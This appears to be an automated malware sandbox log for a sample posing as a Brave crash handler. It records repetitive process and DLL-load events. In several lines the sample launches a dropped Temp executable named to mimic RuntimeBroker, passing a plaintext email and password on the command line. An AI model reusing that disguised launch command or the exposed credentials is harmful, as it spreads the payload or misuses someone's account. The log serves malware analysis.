Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
